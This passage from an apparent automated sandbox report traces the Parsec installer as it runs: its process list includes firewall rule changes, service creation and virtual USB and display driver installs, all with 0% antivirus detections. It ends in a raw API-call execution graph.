                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:20:58:31
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:20:58:31
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
                            Imagebase:0xe90000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:20:58:31
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:20:58:32
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:20:58:32
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:20:58:32
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" start Parsec
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec\pservice.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Parsec\pservice.exe"
                            Imagebase:0x7ff7cd030000
                            File size:418'696 bytes
                            MD5 hash:46CD3FC327AF9109BD143BA7F16DF397
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:false

                            Target ID:40
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                            Imagebase:0x400000
                            File size:907'184 bytes
                            MD5 hash:2D009D446A0BA83EC2F12242F7ED126C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:46
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                            Imagebase:0x7ff72c2f0000
                            File size:596'352 bytes
                            MD5 hash:DDDEE00430F7A3D52580B7C85D63D9DC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:49
                            Start time:20:58:35
                            Start date:13/11/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
                            Imagebase:0x7ff7bbb40000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:20:58:35
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:20:58:35
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
                            Imagebase:0x7ff7e5a80000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:52
                            Start time:20:58:36
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
                            Imagebase:0x7ff7e5a80000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:20:58:36
                            Start date:13/11/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                            Imagebase:0x7ff7e52b0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:54
                            Start time:20:58:36
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:20:58:38
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:20:58:40
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
                            Imagebase:0x7ff7e5a80000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:20:58:40
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:20:58:41
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:20:58:42
                            Start date:13/11/2024
                            Path:C:\Windows\System32\runonce.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\runonce.exe" -r
                            Imagebase:0x7ff600600000
                            File size:61'952 bytes
                            MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:20:58:42
                            Start date:13/11/2024
                            Path:C:\Windows\System32\grpconv.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\grpconv.exe" -o
                            Imagebase:0x7ff679d30000
                            File size:52'736 bytes
                            MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:20:58:43
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                            Imagebase:0x400000
                            File size:517'256 bytes
                            MD5 hash:4B9A3048286692A865187013B70F44E8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:66
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wevtutil.exe
                            Wow64 process (32bit):true
                            Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
                            Imagebase:0xdd0000
                            File size:208'384 bytes
                            MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\System32\wevtutil.exe
                            Wow64 process (32bit):false
                            Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
                            Imagebase:0x7ff7040d0000
                            File size:278'016 bytes
                            MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:.\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
                            Imagebase:0x7ff618140000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:72
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:.\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
                            Imagebase:0x7ff618140000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:.\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
                            Imagebase:0x7ff618140000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.3%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:52
API calls 33343->33344 33345 f8886f 33344->33345 33346 f888d4 33345->33346 33348 f8889b 33345->33348 33352 f888d0 33345->33352 33405 f86e88 14 API calls 33346->33405 33403 f864e8 25 API calls 33348->33403 33351 f8893d 33354 f889d2 free 33351->33354 33378 f87924 33352->33378 33353 f888b3 33353->33352 33404 f86e88 14 API calls 33353->33404 33354->33341 33357 f8895b 33406 f77474 56 API calls 33357->33406 33359 f88967 33360 f88981 33359->33360 33407 f86e88 14 API calls 33359->33407 33363 f88985 33360->33363 33408 f882c8 218 API calls 33360->33408 33363->33351 33363->33354 33365 f87b76 33364->33365 33366 f87b2c 33364->33366 33365->33339 33366->33365 33428 f86e88 14 API calls 33366->33428 33369 fab319 33368->33369 33370 fab385 33369->33370 33376 fab32a 33369->33376 33377 fab31f 33369->33377 33371 f7be6c VariantClear 33370->33371 33373 fab34b 33371->33373 33372 f7be6c VariantClear 33372->33373 33373->33339 33374 fab34f 33375 f7be6c VariantClear 33374->33375 33375->33373 33376->33374 33376->33377 33377->33372 33379 f87949 33378->33379 33380 f87942 33378->33380 33383 f8798e 33379->33383 33415 f799cc 33379->33415 33380->33351 33380->33357 33384 f879d2 33383->33384 33388 f87a4d 33383->33388 33421 f85f8c 6 API calls 33383->33421 33384->33388 33422 f73504 33384->33422 33387 f87aa8 33410 f7eee4 33387->33410 33388->33387 33409 f79878 SetFileTime 33388->33409 33394 f87a0f 33395 f87a1f 33394->33395 33396 f87a13 33394->33396 33427 f79960 WriteFile 33395->33427 33397 f7960c CloseHandle 33396->33397 33402 f87a1d free 33397->33402 33399 f87a37 33401 f7960c CloseHandle 33399->33401 33401->33402 33402->33388 33403->33353 33404->33352 33405->33352 33406->33359 33407->33360 33408->33363 33409->33387 33411 f7960c CloseHandle 33410->33411 33412 f7eef3 33411->33412 33413 f7ef06 33412->33413 33414 f7eef9 GetLastError 33412->33414 33413->33380 33414->33413 33416 f796f8 5 API calls 33415->33416 33417 f799e7 33416->33417 33418 f799f4 33417->33418 33419 f799f8 SetEndOfFile 33417->33419 
33418->33383 33420 f86e88 14 API calls 33418->33420 33419->33418 33420->33383 33421->33384 33423 f7351c 33422->33423 33424 f73470 4 API calls 33423->33424 33425 f73542 33424->33425 33426 f7a030 48 API calls 33425->33426 33426->33394 33427->33399 33428->33365 33429 f86bc8 33430 f86bde 33429->33430 33431 f86be5 33429->33431 33433 fc02dc EnterCriticalSection 33431->33433 33434 fc0315 LeaveCriticalSection 33433->33434 33435 fc0300 33433->33435 33434->33430 33436 fcb774 32 API calls 33435->33436 33436->33434 33437 f8b64c 33438 f8b689 33437->33438 33480 f8649c 33438->33480 33441 f8b7c9 33443 f7be6c VariantClear 33441->33443 33442 f8b7da 33444 f8b7fd 33442->33444 33445 f8b7e9 33442->33445 33472 f8b7d3 33443->33472 33446 f7be6c VariantClear 33444->33446 33447 f7be6c VariantClear 33445->33447 33448 f8b817 33446->33448 33447->33472 33514 f8a24c 33448->33514 33453 fab2cc VariantClear 33454 f8b862 33453->33454 33457 f8b89d 33454->33457 33454->33472 33697 f8a024 29 API calls 33454->33697 33456 f8b8fb 33458 f8bbed 33456->33458 33459 f8bab6 33456->33459 33462 f8b8bd 33457->33462 33471 f8b908 33457->33471 33457->33472 33466 f8bc58 33458->33466 33467 f8bc14 33458->33467 33458->33472 33465 f72350 2 API calls 33459->33465 33477 f8bac9 33459->33477 33460 f8b938 33460->33472 33700 f88db8 free free memmove 33460->33700 33462->33456 33698 f88db8 free free memmove 33462->33698 33465->33477 33569 f8ac94 33466->33569 33470 f72350 2 API calls 33467->33470 33469 f8bba0 free 33469->33472 33470->33472 33471->33460 33471->33472 33699 f74ee4 CharUpperW CharUpperW 33471->33699 33475 f8bb74 33479 f739ac 6 API calls 33475->33479 33701 f9efc0 33477->33701 33479->33469 33484 f864ac 33480->33484 33481 fad50a 33482 faa074 VariantClear 33481->33482 33485 fad52f 33482->33485 33483 fad4f3 free free 33483->33484 33484->33481 33484->33483 33486 f8b795 33485->33486 33708 fac8e4 15 API calls 33485->33708 33486->33441 33486->33442 33486->33472 33488 fad54f 33488->33486 33489 f73798 4 API calls 33488->33489 
